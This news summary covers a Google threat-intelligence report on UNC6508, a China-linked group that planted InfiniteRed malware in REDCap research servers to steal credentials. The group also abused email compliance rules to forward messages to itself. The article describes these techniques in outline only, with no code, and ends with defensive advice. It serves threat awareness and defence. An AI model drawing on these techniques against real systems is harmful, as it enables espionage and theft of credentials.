A new report from **Google Threat Intelligence Group (GTIG)** details a long-running espionage campaign by a China-linked threat actor, **UNC6508**. The group successfully breached **REDCap** servers at a North American medical research institution, stealing sensitive data for over a year. **REDCap** is a widely adopted platform for building and managing databases and surveys in medical and scientific research, adhering to relevant regulatory standards. ### Initial Compromise and Persistence While the precise initial access vector remains unconfirmed, researchers observed **UNC6508** probing older, vulnerable versions of **REDCap**. The compromise of the medical research organization occurred in September 2023, with malicious activity continuing through November 2025. Three months after initial access, the attackers deployed **InfiniteRed**, a custom malware specifically designed for **REDCap** systems. This malware's components were hidden by trojanizing the server’s system files. ### The InfiniteRed Malware Suite **InfiniteRed** comprises three main components: * A persistence/update module * A credential harvester * A backdoor  The credential harvester actively captures usernames and passwords submitted through **REDCap** login pages. These stolen credentials are then encrypted and stored in local **REDCap** database tables for later retrieval. The backdoor, which receives commands via HTTP cookies, grants **UNC6508** extensive control over the compromised server, including the ability to: * Execute shell commands * Upload and download files * Run arbitrary SQL queries * Retrieve and delete stolen credential records * Access system and database information ### Novel Data Exfiltration Techniques In a notable departure from typical China-linked threat actor tactics, **UNC6508** utilized legitimate 'content compliance rules' within cloud-based enterprise productivity tools for data exfiltration. After gaining administrator access, the group created a rule named “Patriot.” This rule was configured to scan the organization's communications for specific keywords, content patterns, email addresses, and phone numbers. Any matches were then automatically forwarded as a blind carbon copy (BCC) to '[email protected]', an address since disabled by **Google**.  The keywords used for exfiltration were highly targeted, focusing on medical research, advanced technology, military topics, and geo-strategic policy, indicating a clear intelligence-gathering objective. ### Operational Security and Impact **GTIG** observed a high level of operational security throughout the campaign, including the use of US-based residential proxy infrastructure, compromised routers, VPS, credential replay, and dedicated infrastructure for data exfiltration. **Google** has notified multiple organizations in the U.S. and Canada that were found to be compromised with the **InfiniteRed** malware. These organizations span critical research areas, from molecular discovery and clinical drug trials to state-level public health policy and military readiness. ### Recommendations for Defense To mitigate similar threats, **REDCap** administrators are strongly advised to: * Upgrade their instances to the latest available versions and remove any legacy deployments. * Implement Multi-Factor Authentication (MFA) or 2-Step Verification (2SV) on all high-privilege accounts. * Consider using Device Bound Session Credentials (DBSC) to prevent session hijacking. **GTIG**'s report includes **YARA** rules and Indicators of Compromise (IoCs) to assist security teams in scanning their environments for **InfiniteRed** malware infections.